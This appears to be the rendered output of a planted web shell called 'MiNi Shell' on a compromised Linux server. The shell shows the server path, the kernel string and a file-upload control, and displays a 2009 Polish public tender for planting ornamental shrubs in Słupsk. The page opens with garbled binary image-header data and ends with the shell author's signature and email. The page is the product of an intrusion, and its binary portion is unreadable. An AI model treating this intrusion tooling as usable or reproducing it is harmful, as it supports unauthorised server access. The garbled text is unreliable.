JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090526/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090526/165886-N-2009.html

<p class="kh_header"><b>Słupsk: Wykonanie nasadzeń  krzewów ozdobnych na terenie skarpy przy ul. Piłsudskiego w Słupsku.</b><br>
<b>Numer ogłoszenia: 165886 - 2009; data zamieszczenia: 26.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Terenów Zieleni Miejskiej i Cmentarzy Komunalnych w Słupsku , ul. Kaszubska 4, 76-200 Słupsk, woj. pomorskie, tel. 059 8413722, 059 8481451, faks 059 8413723.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ztzmick.slupsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie nasadzeń  krzewów ozdobnych na terenie skarpy przy ul. Piłsudskiego w Słupsku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.Przedmiot zamówienia obejmuje:
  1) ręczne zdjęcie warstwy ziemi urodzajnej - grunt zadarniony - 14 m3,
  2) przekopanie gleby na skarpach - 245 m2,
  3) sadzenie krzewów ozdobnych tj. pęcherznica kalinolistna - 300 szt., żylistek szorstki - 300 
      szt., jaśminowiec wonny - 50 szt., kalina koralowa - 50 szt. , krzewuszka cudowna - 100 
      szt. , forsycja pośrednia - 130 szt., tawuła japońska  Marcophylla - 50 szt.,
  4) ściółkowanie nasadzeń- gr. 3 cm ,
  5) podlanie roślin po posadzeniu,
  6) wywóz zanieczyszczeń..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Przed złożeniem oferty Wykonawcy powinni wnieść wadium   w kwocie 300,00 zł  w terminie do 2 czerwca  2009r. do godz. 10.00 .	
2. Wadium powinno być wniesione w formie określonej z art. 45 ust. 6 ustawy - Prawo zamówień publicznych.
3. Jeżeli wadium będzie wniesione w pieniądzu, powinno być wpłacone  na rachunek bankowy ZTZMiCK w Słupsku Nr 80124037701111000040698322 .<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy , którzy nie podlegają wykluczeniu z udziału w postępowaniu na podstawie art. 24 oraz spełniają warunki udziału w postępowaniu określone w art. 22 ust.1 ustawy - Prawo zamówień publicznych tzn.:
1)	posiadają uprawnienia do wykonywania działalności w zakresie objętym 
      przedmiotem zamówienia,
2)	posiadają niezbędną wiedzę i doświadczenie tj.: wykonali w okresie trzech ostatnich lat licząc od daty wszczęcia niniejszego postępowania co najmniej trzy  usługi:
a)	z których każda odpowiada swoim rodzajem przedmiotowi zamówienia tj. wykonaniu nasadzeń krzewów ozdobnych,
b)	których  wartość brutto jest nie mniejsza niż 30.000,00 zł dla każdej z  usług;
3)	dysponują osobami zdolnymi do wykonania zamówienia tj. 
      w zakresie nadzoru - 1 osobą z wykształceniem wyższym ogrodniczym 
      lub z kwalifikacjami gospodarza terenów zieleni - ukończonym kursem na 
      poziomie II stopnia NOT i minimum 3 letnim stażem oraz minimum 2  
      ogrodnikami z wykształceniem technicznym lub zawodowym lub   
      przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia 
      potencjału technicznego i osób zdolnych do wykonania zamówienia,
4)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj.:
                        a) posiadają  środki finansowe lub zdolność kredytową w wysokości nie 
                           mniejszej niż 40.000,00 zł,oraz 
                       b) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej 
                          działalności gospodarczej na kwotę nie mniejszą niż 100 tys. zł.
2.	Powyższe warunki zostaną uznane za spełnione, jeżeli Wykonawca dostarczy dokumenty i oświadczenia określone w dziale VI w pkt. 1-3 i dziale VIII ust.2 pkty 1-8..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta powinna zawierać:
1)	oświadczenie Wykonawcy o spełnieniu warunków określonych w art. 22 ust. 1 ustawy - Prawo zamówień publicznych - załącznik nr 3 do SIWZ wraz z aktualnym odpisem z właściwego rejestru albo aktualnym zaświadczeniem o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionymi nie wcześniej niż 6 miesięcy przed upływem terminu składania   ofert,
2)	oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych,  na formularzu oświadczenia stanowiącym załącznik nr 4 do SIWZ  wraz z zaświadczeniem, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne,
3)	wykaz osób i podmiotów, które będą wykonywać zamówienie  wraz z udokumentowaniem ich kwalifikacji w zakresie usług ogrodniczych/ w zakresie nadzoru - 1 osoba z wykształceniem wyższym ogrodniczym lub z kwalifikacjami gospodarza terenów zieleni - ukończony kurs na poziomie II stopnia NOT i minimum 3 letnim stażem oraz minimum 2  ogrodników z wykształceniem technicznym lub zawodowym / lub  przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - załącznik nr 6. 
2.	Wykaz dokumentów , jakie należy załączyć do oferty poza wymienionymi w dziale VI:
1)	wypełniony formularz oferty - załącznik nr 1 do SIWZ,
2)	oświadczenie o akceptacji treści SIWZ i  projektu umowy stanowiącego
       integralną część specyfikacji - załącznik nr 2 do SIWZ,
3)   aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do  
                        ewidencji działalności gospodarczej,
4)   aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz oddziału 
      Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
      Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z 
       opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne lub 
       społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, 
       odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości 
       wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 
       miesiące przed upływem terminu składania ofert,
                  5)    wykaz wykonanych 3 usług w okresie ostatnich trzech lat przed dniem wszczęcia 
                          postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności
                         jest krótszy - w tym okresie, potwierdzający spełnienie warunku dotyczącego 
                         niezbędnej wiedzy i doświadczenia z podaniem ich wartości, przedmiotu, dat 
                         wykonania i odbiorców - załącznik nr 5 do SIWZ oraz załączenie dokumentów 
                         potwierdzających, że wykazane  usługi zostały wykonane należycie (z 
                         dokumentów potwierdzających należyte wykonanie usług powinny wynikać 
                         informacje zawarte w wykazie), 
                  6)   wykaz  osób,  które będą uczestniczyć w wykonywaniu zamówienia / ust.VI pkt.3 
                        SIWZ / z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i
                        wykształcenia niezbędnego do wykonania zamówienia, a także zakresu 
                        wykonywanych przez nich czynności - załącznik nr 6 do SIWZ / wymóg ten 
                        będzie spełniony, jeżeli Wykonawca udokumentuje zatrudnienie 12 osób w ciągu 
                        ostatnich trzech miesięcy przed dniem wszczęcia postępowania potwierdzonych 
                        przez ZUS na podstawie  druków DRA o opłacaniu składek na ubezpieczenia   
                        społeczne/  lub przedstawią pisemne zobowiązanie innych podmiotów do 
                        udostępnienia potencjału technicznego i osób zdolnych do wykonania 
                        zamówienia,
7) parafowany i wypełniony projekt umowy - załącznik nr 7do SIWZ,
8) dowód wniesienia wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ztzmick.slupsk.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Terenów Zieleni Miejskiej i Cmentarzy Komunalnych w Supsku
ul. Rabina dr. Maxa Josepha 4
76-200 Słupsk.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2009 godzina 10:00, miejsce: Zarząd Terenów Zieleni Miejskiej i Cmentarzy Komunalnych w Supsku
ul. Rabina dr. Maxa Josepha 4
76-200 Słupsk.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com